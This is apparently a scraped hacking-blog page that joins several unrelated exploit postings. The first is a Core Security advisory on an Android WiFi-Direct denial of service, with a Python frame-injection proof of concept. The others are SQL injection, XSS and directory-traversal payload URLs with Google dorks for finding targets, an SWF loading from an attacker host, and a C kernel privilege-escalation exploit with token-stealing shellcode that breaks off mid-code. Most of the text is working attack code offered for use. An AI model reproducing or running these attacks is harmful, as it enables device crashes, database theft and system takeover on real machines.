Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
Android WiFi-Direct Denial of Service
1. *Advisory Information*
Title: Android WiFi-Direct Denial of Service
Advisory ID: CORE-2015-0002
Advisory URL:
http://www.coresecurity.com/advisories/android-wifi-direct-denial-service
Date published: 2015-01-26
Date of last update: 2015-01-26
Vendors contacted: Android Security Team
Release mode: User release
2. *Vulnerability Information*
Class: Uncaught Exception [CWE-248]
Impact: Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-0997
3. *Vulnerability Description*
Some Android devices are affected by a Denial of Service attack when
scanning for WiFi Direct devices.
An attacker could send a specially crafted 802.11 Probe Response frame
causing the Dalvik subsystem to reboot because of an Unhandle Exception
on WiFiMonitor class.
4. *Vulnerable Packages*
. Nexus 5 - Android 4.4.4
. Nexus 4 - Android 4.4.4
. LG D806 - Android 4.2.2
. Samsung SM-T310 - Android 4.2.2
. Motorola RAZR HD - Android 4.1.2
Other devices could be also affected.
5. *Non-vulnerable packages*
. Android 5.0.1
. Android 5.0.2
6. *Vendor Information, Solutions and Workarounds*
Some mitigation actions may be to avoid using WiFi-Direct or update
to a non-vulnerable Android version.
Contact vendor for further information.
7. *Credits*
This vulnerability was discovered and researched by Andres Blanco
from the CoreLabs
Team. The publication of this advisory was coordinated by the Core
Advisories
Team.
8. *Technical Description / Proof of Concept Code*
Android makes use of a modified *wpa_supplicant*[1]
in order to provide an interface between the wireless driver and the
Android platform framework.
Below the function that handles *wpa_supplicant* events. This function
returns a jstring from calling NewStringUTF method.
/-----
static jstring android_net_wifi_waitForEvent(JNIEnv* env, jobject)
{
char buf[EVENT_BUF_SIZE];
int nread = ::wifi_wait_for_event(buf, sizeof buf);
if (nread > 0) {
return env->NewStringUTF(buf);
} else {
return NULL;
}
}
-----/
The WiFi-Direct specification defines the P2P discovery procedure to
enable P2P
devices to exchange device information, the device name is part of
this information.
The WifiP2pDevice class, located at
/wifi/java/android/net/wifi/p2p/WifiP2pDevice.java,
represents a Wi-Fi p2p device. The constructor method receives the
string provided by
the *wpa_supplicant* and throws an IllegalArgumentException in case
the event is malformed.
Below partial content of the WiFiP2PDevice.java file.
/-----
[...]
/** Detailed device string pattern with WFD info
* Example:
* P2P-DEVICE-FOUND 00:18:6b:de:a3:6e
p2p_dev_addr=00:18:6b:de:a3:6e
* pri_dev_type=1-0050F204-1 name='DWD-300-DEA36E'
config_methods=0x188
* dev_capab=0x21 group_capab=0x9
*/
private static final Pattern detailedDevicePattern =
Pattern.compile(
"((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) " +
"(\\d+ )?" +
"p2p_dev_addr=((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) " +
"pri_dev_type=(\\d+-[0-9a-fA-F]+-\\d+) " +
"name='(.*)' " +
"config_methods=(0x[0-9a-fA-F]+) " +
"dev_capab=(0x[0-9a-fA-F]+) " +
"group_capab=(0x[0-9a-fA-F]+)" +
"( wfd_dev_info=0x000006([0-9a-fA-F]{12}))?"
);
[...]
/**
* @param string formats supported include
* P2P-DEVICE-FOUND fa:7b:7a:42:02:13
p2p_dev_addr=fa:7b:7a:42:02:13
* pri_dev_type=1-0050F204-1 name='p2p-TEST1'
config_methods=0x188 dev_capab=0x27
* group_capab=0x0 wfd_dev_info=000006015d022a0032
*
* P2P-DEVICE-LOST p2p_dev_addr=fa:7b:7a:42:02:13
*
* AP-STA-CONNECTED 42:fc:89:a8:96:09
[p2p_dev_addr=02:90:4c:a0:92:54]
*
* AP-STA-DISCONNECTED 42:fc:89:a8:96:09
[p2p_dev_addr=02:90:4c:a0:92:54]
*
* fa:7b:7a:42:02:13
*
* Note: The events formats can be looked up in the
wpa_supplicant code
* @hide
*/
public WifiP2pDevice(String string) throws
IllegalArgumentException {
String[] tokens = string.split("[ \n]");
Matcher match;
if (tokens.length < 1) {
throw new IllegalArgumentException("Malformed supplicant
event");
}
switch (tokens.length) {
case 1:
/* Just a device address */
deviceAddress = string;
return;
case 2:
match = twoTokenPattern.matcher(string);
if (!match.find()) {
throw new IllegalArgumentException("Malformed
supplicant event");
}
deviceAddress = match.group(2);
return;
case 3:
match = threeTokenPattern.matcher(string);
if (!match.find()) {
throw new IllegalArgumentException("Malformed
supplicant event");
}
deviceAddress = match.group(1);
return;
default:
match = detailedDevicePattern.matcher(string);
if (!match.find()) {
throw new IllegalArgumentException("Malformed
supplicant event");
}
deviceAddress = match.group(3);
primaryDeviceType = match.group(4);
deviceName = match.group(5);
wpsConfigMethodsSupported = parseHex(match.group(6));
deviceCapability = parseHex(match.group(7));
groupCapability = parseHex(match.group(8));
if (match.group(9) != null) {
String str = match.group(10);
wfdInfo = new
WifiP2pWfdInfo(parseHex(str.substring(0,4)),
parseHex(str.substring(4,8)),
parseHex(str.substring(8,12)));
}
break;
}
if (tokens[0].startsWith("P2P-DEVICE-FOUND")) {
status = AVAILABLE;
}
}
[...]
-----/
On some Android devices when processing a probe response frame with a
WiFi-Direct(P2P)
information element that contains a device name attribute with
specific bytes generates
a malformed supplicant event string that ends up throwing the
IllegalArgumentException.
As this exception is not handled the Android system restarts.
Below partial content of the logcat of a Samsung SM-T310 running
Android 4.2.2.
/-----
I/p2p_supplicant( 2832): P2P-DEVICE-FOUND 00.EF.00
p2p_dev_addr=00.EF.00 pri_dev_type=10-0050F204-5 'fa¬¬'
config_methods=0x188 dev_capab=0x21 group_capab=0x0
E/AndroidRuntime( 2129): !@*** FATAL EXCEPTION IN SYSTEM PROCESS:
WifiMonitor
E/AndroidRuntime( 2129): java.lang.IllegalArgumentException:
Malformed supplicant event
E/AndroidRuntime( 2129): at
android.net.wifi.p2p.WifiP2pDevice.<init>(WifiP2pDevice.java:229)
E/AndroidRuntime( 2129): at
android.net.wifi.WifiMonitor$MonitorThread.handleP2pEvents(WifiMonitor.java:966)
E/AndroidRuntime( 2129): at
android.net.wifi.WifiMonitor$MonitorThread.run(WifiMonitor.java:574)
E/android.os.Debug( 2129): !@Dumpstate > dumpstate -k -t -z -d -o
/data/log/dumpstate_sys_error
-----/
8.1. *Proof of Concept*
This PoC was implemented using the open source library Lorcon
[2] and PyLorcon2 [3], a Python wrapper for the Lorcon library.
/-----
#!/usr/bin/env python
import sys
import time
import struct
import PyLorcon2
def get_probe_response(source, destination, channel):
frame = str()
frame += "\x50\x00" # Frame Control
frame += "\x00\x00" # Duration
frame += destination
frame += source
frame += source
frame += "\x00\x00" # Sequence Control
frame += "\x00\x00\x00\x00\x00\x00\x00\x00" # Timestamp
frame += "\x64\x00" # Beacon Interval
frame += "\x30\x04" # Capabilities Information
# SSID IE
frame += "\x00"
frame += "\x07"
frame += "DIRECT-"
# Supported Rates
frame += "\x01"
frame += "\x08"
frame += "\x8C\x12\x98\x24\xB0\x48\x60\x6C"
# DS Parameter Set
frame += "\x03"
frame += "\x01"
frame += struct.pack("B", channel)
# P2P
frame += "\xDD"
frame += "\x27"
frame += "\x50\x6F\x9A"
frame += "\x09"
# P2P Capabilities
frame += "\x02" # ID
frame += "\x02\x00" # Length
frame += "\x21\x00"
# P2P Device Info
frame += "\x0D" # ID
frame += "\x1B\x00" # Length
frame += source
frame += "\x01\x88"
frame += "\x00\x0A\x00\x50\xF2\x04\x00\x05"
frame += "\x00"
frame += "\x10\x11"
frame += "\x00\x06"
frame += "fafa\xFA\xFA"
return frame
def str_to_mac(address):
return "".join(map(lambda i: chr(int(i, 16)), address.split(":")))
if __name__ == "__main__":
if len(sys.argv) != 3:
print "Usage:"
print " poc.py <iface> <target>"
print "Example:"
print " poc.py wlan0 00:11:22:33:44:55"
sys.exit(-1)
iface = sys.argv[1]
destination = str_to_mac(sys.argv[2])
context = PyLorcon2.Context(iface)
context.open_injmon()
channel = 1
source = str_to_mac("00:11:22:33:44:55")
frame = get_probe_response(source, destination, channel)
print "Injecting PoC."
for i in range(100):
context.send_bytes(frame)
time.sleep(0.100)
-----/
9. *Report Timeline*
. 2014-09-26:
Core Security contacts Android security team to inform them that
a vulnerability has been found in Android. Core Security sends a draft
advisory with technical details and PoC files.
. 2014-09-29:
Android Security Team acknowledges reception of the advisory.
. 2014-09-30:
Core Security notifies that the tentative publication date is
set for Oct 20rd, 2014.
. 2014-09-30:
Android Security Team acknowledges.
. 2014-10-16:
Core Security requests a status update.
. 2014-10-16:
Android Security Team responds that they have classify the
vulnerability as low severity and don't currently have a timeline for
releasing a fix.
. 2014-10-20:
Core Security does not completely agrees with the vulnerability
classification and reschedule the publication of the advisory.
. 2014-10-16:
Android Security Team acknowledges and strengthens it's position
that they don't currently have a timeline for releasing a fix.
. 2015-01-06:
Core Security requests a status update.
. 2015-01-12:
Core Security asks for confirmation of reception of the previous
email.
. 2015-01-16:
Android Security Team acknowledges and respond that they don't
currently have a timeline for releasing a fix.
. 2015-01-19:
Core Security notifies that vendor cooperation is needed in
order to keep this process coordinated. If vendor refuses to provide the
requested information the advisory will be released tagged as 'user
release'. The advisory is re-scheduled for January 26th, 2015.
. 2015-01-20:
Android Security Team acknowledges and respond that they don't
currently have a timeline for releasing a fix.
. 2015-01-26:
The advisory CORE-2015-0002 is published.
10. *References*
[1] - wpa_supplicant site. http://w1.fi/wpa_supplicant/
[2] - Lorcon site. https://code.google.com/p/lorcon
[3] - PyLorcon2 site. http://code.google.com/p/pylorcon2
11. *About CoreLabs*
CoreLabs, the research center of Core Security, is charged with
anticipating
the future needs and requirements for information security technologies.
We conduct our research in several important areas of computer security
including system vulnerabilities, cyber attack planning and simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. CoreLabs regularly publishes security
advisories, technical papers, project information and shared software
tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright
(c) 2014 Core Security and (c) 2014 CoreLabs,
and are licensed under a Creative Commons
Attribution Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863130506
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: jclassifiedsmanager Multiple Vulnerabilities
# Google Dork: inurl:com_jclassifiedsmanager
# Date: 26 Jan 2015
# Exploit Author: Sarath Nair aka AceNeon13
# Contact: @AceNeon13
# Greetings: HariKrishnan, Raj3sh.tv, Deepu.tv
# Vendor Homepage: cmsjunkie.com
# Software Link: http://www.cmsjunkie.com/classifieds-manager
# PoC Exploit: SQL Injection
--------------------------------
http://localhost/jclassifiedsmanager/classifieds/offerring-ads?controller=displayads&view=displayads&task=viewad&id=[SQL Injection Here]
"id" parameter is not sanitized.
# PoC Exploit: XSS Reflected
--------------------------------
http://localhost/jclassifiedsmanager/classifieds?view=displayads7ed3b"onload%3d"alert(1)"87d4d&layout=offerring&controller=displayads&adtype=1
"view" parameter is not sanitized.
########################################
# Vulnerability Disclosure Timeline:
2014-Dec-11: Discovered vulnerability
2014-Dec-12: Vendor Notification
2014-Dec-12: Vendor Response/Feedback
2015-Jan-19: Vendor Fix/Patch
2015-Jan-26: Public Disclosure
#######################################
################################################################################################
# #
# ...:::::ManageEngine EventLog Analyzer Directory Traversal/XSS Vulnerabilities::::.... #
# #############################################################################################
Sobhan System Network & Security Group (sobhansys)
-------------------------------------------------------
# Date: 2015-01-24
# Exploit Author: AmirHadi Yazdani (Sobhansys Co)
# Vendor Homepage: http://www.manageengine.com/products/eventlog/
# Demo Link: http://demo.eventloganalyzer.com/event/index3.do
#Affected version: <= Build Version : 9.0
About ManageEngine EventLog Analyzer (From Vendor Site) :
EventLog Analyzer provides the most cost-effective Security Information and Event Management (SIEM) software on the market.
Using this Log Analyzer software, organizations can automate
the entire process of managing terabytes of machine generated logs by collecting, analyzing, correlating, searching, reporting,
and archiving from one central location.
This event log analyzer software helps to monitor file integrity, conduct log forensics analysis,
monitor privileged users and comply to different compliance regulatory bodies
by intelligently analyzing your logs and instantly generating a variety of reports like user activity reports, historical trend reports, and more.
--------------------------------------------------------
I'M hadihadi From Virangar Security Team
special tnx to:MR.nosrati,black.shadowes,MR.hesy
& all virangar members & all hackerz
greetz to My friends In Signal IT Group (www.signal-net.net) & A.Molaei
spl:Z.Khodaee
-------
exploit:
Diretory Traversal :
http://127.0.0.1/event/index2.do?helpP=userReport&overview=true&tab=report&url=../../WEB-INF/web.xml%3f
http://127.0.0.1/event/index2.do?completeData=true&helpP=archiveAction&tab=system&url=../../WEB-INF/web.xml%3f
http://127.0.0.1/event/index2.do?helpP=fim&link=0&sel=13&tab=system&url=../../WEB-INF/web.xml%3f
XSS :
http://127.0.0.1/event/index2.do?helpP=userReport&overview=true&tab=report&url=userReport'%22()%26%25<ahy><ScRiPt%20>prompt(915375)</ScRiPt>
http://127.0.0.1/event/index2.do?helpP=fim&link=0&sel=13'%22()%26%25<ahy><ScRiPt%20>prompt(978138)</ScRiPt>&tab=system&url=ConfigureTemplate
----
Sobhan system Co.
Signal Network And Security Group (www.signal-net.net)
E-mail: amirhadi.yazdani@gmail.com,a.h.yazdani@signal-net.net
# Exploit Title: sql injection
# Google Dork: inurl:webquest/soporte_horizontal_w.php?id_actividad=
# Date: [24/01/2015]
# Exploit Author: [jord4nroo7] anonjo@aol.com
# Vendor Homepage: [http://phpwebquest.org]
# Software Link: [http://phpwebquest.org/?page_id=14]
# Version: [phpwebquest-2.6]
# Tested on: [windows 8.1]
#Exploit: sql inhection found on phpwebquest script version 2.6
#
#example http://localhost/phpwq/webquest/soporte_horizontal_w.php?id_actividad=184&id_pagina=1%27'
#---------------------------
if ($_GET['id_actividad']!=''){
$id_actividad=$_GET['id_actividad'];--------->sqlinjection here
}else{
$id_actividad='1500000';
}
if ($_GET['id_pagina']!=''){
$id_pagina=$_GET['id_pagina'];
}else{
$id_pagina='1';
$texto_actual=$texto_alternativo;
$imagen_actual='../imagenes/no_imagen.gif';
}
#----------------------------
<?
session_cache_limiter('nocache,private');
session_start();
session_set_cookie_params(0, "/", $HTTP_SERVER_VARS["HTTP_HOST"], 0);
include("../include/mysql.php");
include("../include/idioma.php");
$base=$mysql_db;
$c=mysql_connect($mysql_server,$mysql_login,$mysql_pass);
mysql_select_db ($base, $c);
#para solucionar un problema que se plantea cuando los usuarios crean la actividad pero no crean páginas
if ($_GET['id_actividad']!=''){
$id_actividad=$_GET['id_actividad'];
}else{
$id_actividad='1500000';
}
if ($_GET['id_pagina']!=''){
$id_pagina=$_GET['id_pagina'];
}else{
$id_pagina='1';
$texto_actual=$texto_alternativo;
$imagen_actual='../imagenes/no_imagen.gif';
}
#echo "PAGINA DEL GET:".$id_pagina."<br>";
#echo "PAGINA DEL GET:".$id_pagina."<br>";
$sentencia= "SELECT * FROM actividad WHERE id_actividad=".$id_actividad;
$resultado=mysql_query($sentencia);
while($v=mysql_fetch_array($resultado)){
foreach ($v as $indice=>$valor){
if(!is_int($indice)){
# echo $indice.":".$valor."<br>";
$campo[$indice]=$valor;
}
}
}
$sentencia="select * from pagina where id_actividad=".$id_actividad." order by num_pagina asc";
$resultado=mysql_query($sentencia);
$j=1;
while($v=mysql_fetch_array($resultado)){
foreach ($v as $indice=>$valor){
if(!is_int($indice)){
#echo $indice.":".$valor."<br>";
$campo[$j][$indice]=$valor;
}
}
$j++;
}
for ($cont=1; $cont<=5; $cont++){
if ($campo[$cont]['num_pagina']==$id_pagina){
$texto_actual=$campo[$cont]['texto'];
$imagen_actual=$campo[$cont]['imagen'];
}
}
$resta=0;
$tamano_enlaces=$campo['font_size'] - $resta ;
$tamano_titulo=$campo['font_size'];
#echo $tamano_titulo;
?>
<html>
<head>
<title>PHP Webquest</title>
<!-- Webquest elaborada con PHP Webquest http://www.phpwebquest.org
Programa elaborado por Antonio Temprano bajo Licencia GPL
Puede ser utilizado gratuitamente por quien quiera hacerlo con fines
educativos y con la obligación de no quitar estas líneas de código
-->
<style>
table {
font-family : <? echo $campo['font_face'];?>;
font-size : <? echo $campo['font_size'];?>;
font-weight : normal;
color: <? echo $campo['color_texto_principal'];?>;
}
a {
font-family : <? echo $campo['font_face'];?>;
font-size : <? echo $campo['font_size'];?>;
text-decoration: none;
color: <? echo $campo['color_enlaces'];?>;
font-weight : normal;
}
a:hover {
position: relative;
top: 1px;
left: 1px;
font-family : <? echo $campo['font_face'];?>;
font-size : <? echo $campo['font_size'];?>;
text-decoration: none;
color: <? echo $campo['color_enlaces_resaltados'];?>;
font-weight : normal;
}
div.phpwebquest { font-size : 7.5pt;}
div.phpwebquest a:link { font-size : 7.5pt;}
div.phpwebquest a:hover { font-size : 7.5pt;}
div.phpwebquest a { font-size : 7.5pt;};
</style>
</head>
<body bgcolor="<? echo $campo['color_fondo_pagina'];?>">
<div align="center">
<table width="750" border="0" cellpadding="0" cellspacing="1" bgcolor="<? echo $campo['color_cuadro_pagina'];?>">
<tr>
<td><div align="center">
<table width="100%" border="0" cellpadding="0" cellspacing="1" bgcolor="<? echo $campo['color_cuadro_texto'];?>">
<tr>
<td><table width="100%" border="0" cellspacing="1" cellpadding="0">
<tr>
<td height="50"><div valign="middle" align="center"><h1><font color="<? echo $campo['color_texto_titulo'];?>"><? echo $campo['titulo'];?></font></h1></div></td>
</tr>
<tr>
<? if ($id_pagina==1){
$titular=$introduccion;
}elseif($id_pagina==2){
$titular=$tareas;
}elseif($id_pagina==3){
$titular=$proceso;
}elseif($id_pagina==4){
$titular=$evaluacion;
}else{
$titular=$conclusiones;
}
?>
<td height="50" bgcolor="<? echo $campo['color_cuadro_pagina'];?>"><font color="<? echo $campo['color_texto_tipo'];?>"><div valign="middle" align="center"><h3><? echo $titular;?></h3></div></font></td>
</tr>
<tr>
<td><table width="100%" border="0" cellspacing="1" cellpadding="0">
<tr>
<td width="81%" valign="top"><table width="100%" height="141" border="0" cellpadding="0" cellspacing="1">
<tr>
<td width="1%" height="139"> </td>
<td width="97%" valign="middle"><div align="left">
<table width="100%" height="134" border="0" cellpadding="0" cellspacing="1">
<tr>
<td width="1%" valign="top"><div align="left"><img src="<? echo $imagen_actual;?>"></div></td>
<td width="2%"> </td>
<td width="97%"><? echo $texto_actual;?><br>
<table align=center width="80%" border=0 bgcolor="<? echo $campo['color_cuadro_menu'];?>">
<? if ($id_pagina==3){
echo '<tr></tr>';
$sentencia="select url, descripcion from url where id_actividad=".$id_actividad;
$resultado=mysql_query($sentencia);
$j=1;
while($v=mysql_fetch_array($resultado)){
foreach ($v as $indice=>$valor){
if(!is_int($indice)){
if($indice=='url'){
echo '<tr><td><div class="celdamenu"><a href='.$valor.' target="_blank"></div>';
}else{
echo $valor."</td></tr>";
}
$url[$j][$indice]=$valor;
}
}
$j++;
}
}
mysql_close($c);
?>
</table>
</td>
</tr>
</table>
</div></td>
<td width="2%"> </td>
</tr>
</table></td>
<td width="15%" valign="top">
<table width="100%" border="0" cellspacing="1" cellpadding="0" bgcolor="<? echo $campo['color_cuadro_texto'];?>" bordercolor="#FFFFFF"><tr><td> </td></tr></table>
<table width="100%" border="0" cellspacing="1" cellpadding="0" bgcolor="<? echo $campo['color_cuadro_menu'];?>" bordercolor="#FFFFFF">
<tr>
<td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=1"; ?>"> <? echo $enlace_introduccion; ?></a></div></td>
</tr>
<tr>
<td height="1" bgcolor="#FFFFFF"></td>
</tr>
<tr>
<td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=2"; ?>"> <? echo $enlace_tareas; ?></a></div></td>
</tr>
<tr>
<td height="1" bgcolor="#FFFFFF"></td>
</tr>
<tr>
<td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=3"; ?>"> <? echo $enlace_proceso; ?></a></font></div></td>
</tr>
<tr>
<td height="1" bgcolor="#FFFFFF"></td>
</tr>
<tr>
<td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=4"; ?>"> <? echo $enlace_evaluacion; ?></a></font></div></td>
</tr>
<tr>
<td height="1" bgcolor="#FFFFFF"></td>
</tr>
<tr>
<td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=5"; ?>"> <? echo $enlace_conclusiones; ?></a></font></div></td>
</tr>
</table></td>
</tr>
</table></td>
</tr>
</table></td>
</tr>
<tr>
<td height="19">
<table width="100%" border="0" cellspacing="1" cellpadding="0">
<tr>
<td width="55%"><div class="phpwebquest" align="right"><? echo $elaborada; ?> <? echo $campo['autor'];?> <? echo $con; ?></div></td>
<td width="45%"><div class="phpwebquest" align="left"><a href="http://www.phpwebquest.org"> PHPWebquest</a></div></td>
</tr>
</table>
</td>
</tr>
</table>
</div></td>
</tr>
</table>
</div>
</body>
</html>
#greetz to all my friends ,balawi,ro3ob hr ,mothana-X , sharingan jo , and anonymous jo , and all muslim hackers
# Exploit Title: SWFupload All Version XSF Vulnerability
# Date: 25/01/2014
# Exploit Author: MindCracker - Team MaDLeeTs
# Contact : MindCrackerKhan@Gmail.com - Maddy@live.com.pk | https://twitter.com/MindCrackerKhan
# Verion : All
# Tested on: Linux / Window
#Description :
XSF occurs when an SWF have permission/able to load another file from another directory or site.The vulnerable
swf can be exploited by just loading swf/img/any ( like Phishing or Cross-Site scripting
#Vulnerable Code :
ExternalInterface.addCallback("SetButtonTextStyle",this.SetButtonTextStyle);
this.SetButtonTextStyle(String(root.loaderInfo.parameters.buttonTextStyle));
}
catch(ex:Object)
{
this.SetButtonTextStyle("");
}
try
{
As you can see the .buttonTextStyle variable is not well configured ( by exactly adding the value ) and This ButtonTextStyle will accept any value
The vulneralbe SWF will load any file
http://victim.com/buttontextstyle.swf?buttonTextStyle=http://attack.com/Exploiting.swf
2.
ExternalInterface.addCallback("SetButtonText",this.SetButtonText);
SetButtonText
{
this.SetButtonText(String(root.loaderInfo.parameters.buttonText));
}
catch(ex:Object)
{
this.SetButtonText("");
}
try
{
#POC
http://victim.com/swfupload.swf?buttonTextStyle=http://attack.com/Exploiting.swf
/*
Exploit Title - Comodo Backup Null Pointer Dereference Privilege Escalation
Date - 23rd January 2015
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - https://www.comodo.com
Tested Version - 4.4.0.0
Driver Version - 1.0.0.957 - bdisk.sys
Tested on OS - 32bit Windows XP SP3 and Windows 7 SP1
OSVDB - http://www.osvdb.org/show/osvdb/112828
CVE ID - CVE-2014-9633
Vendor fix url - http://forums.comodo.com/news-announcements-feedback-cb/comodo-backup-44123-released-t107293.0.html
Fixed version - 4.4.1.23
Fixed Driver Ver - 1.0.0.972
Note
----
Does not cleanly exit, had to use some leave instructions to get the command
prompt. If you know of a better way please do let me know.
Below in from Windows XP in IofCallDriver function.
eax = 12h
804e37fe 8b7108 mov esi,dword ptr [ecx+8] <- control the null page as ecx = 00000000
804e3801 52 push edx
804e3802 51 push ecx
804e3803 ff548638 call dword ptr [esi+eax*4+38h] ds:0023:00000080=00000090
804e3807 5e pop esi
804e3808 c3 ret
esi + eax*4 + 38h = 0 + 48 + 38 = 80h if ESI is null
*/
#include <stdio.h>
#include <windows.h>
#define BUFSIZE 4096
typedef NTSTATUS (WINAPI *_NtAllocateVirtualMemory)(
IN HANDLE ProcessHandle,
IN OUT PVOID *BaseAddress,
IN ULONG ZeroBits,
IN OUT PULONG RegionSize,
IN ULONG AllocationType,
IN ULONG Protect);
// Windows XP SP3
#define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct
#define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct
#define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct
// Windows 7 SP1
#define W7_KPROCESS 0x50 // Offset to _KPROCESS from a _ETHREAD struct
#define W7_TOKEN 0xf8 // Offset to TOKEN from the _EPROCESS struct
#define W7_UPID 0xb4 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define W7_APLINKS 0xb8 // Offset to ActiveProcessLinks _EPROCESS struct
BYTE token_steal_xp[] =
{
0x52, // push edx Save edx on the stack
0x53, // push ebx Save ebx on the stack
0x33,0xc0, // xor eax, eax eax = 0
0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax
0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN
0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX
0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX
0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x5b, // pop ebx Restores ebx
0x5a, // pop edx Restores edx
0xc9, // leave
0xc9, // leave
0xc9, // leave
0xc9, // leave
0xc3 // ret
};
BYTE token_steal_w7[] =
{
0x52, // push edx Save edx on the stack
0x53, // push ebx Save ebx on the stack
0x33,0xc0, // xor eax, eax eax = 0
0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,W7_KPROCESS, // mov eax, [eax+W7_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax
0x8b,0x98,W7_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+W7_TOKEN] Retrieves TOKEN
0x8b,0x80,W7_APLINKS,0x00,0x00,0x00, // mov eax, [eax+W7_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,W7_APLINKS,0x00,0x00,0x00, // sub eax, W7_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,W7_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+W7_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,W7_TOKEN,0x00,0x00,0x00, // mov edx, [eax+W7_TOKEN] Retrieves TOKEN and stores on EDX
0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX
0x89,0x90,W7_TOKEN,0x00,0x00,0x00, // mov [eax+W7_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x5b, // pop ebx Restores ebx
0x5a, // pop edx Restores edx
0xc9, // leave
0xc9, // leave
0xc9, // leave
0xc9, // leave
0xc3 // ret
};
BYTE ESInull[] = "\x00\x00\x00\x00";
BYTE RETaddr[] = "\x90\x00\x00\x00";
int GetWindowsVersion()
{
int v = 0;
DWORD version = 0, minVersion = 0, majVersion = 0;
version = GetVersion();
minVersion = (DWORD)(HIBYTE(LOWORD(version)));
majVersion = (DWORD)(LOBYTE(LOWORD(version)));
if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP;
if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7";
return v;
}
void spawnShell()
{
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&pi, sizeof(pi));
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOWNORMAL;
if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
{
printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
return;
}
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
int main(int argc, char *argv[])
{
_NtAllocateVirtualMemory NtAllocateVirtualMemory;
NTSTATUS allocstatus;
LPVOID base_addr = (LPVOID)0x00000001;
DWORD written;
int rwresult;
int size = BUFSIZE;
HANDLE hDevice;
unsigned char buffer[BUFSIZE];
unsigned char devhandle[MAX_PATH];
printf("-------------------------------------------------------------------------------\n");
printf(" COMODO Backup (bdisk.sys) Null Pointer Dereference EoP Exploit \n");
printf(" Tested on Windows XP SP3/Windows 7 SP1 (32bit) \n");
printf("-------------------------------------------------------------------------------\n\n");
sprintf(devhandle, "\\\\.\\%s", "bdisk");
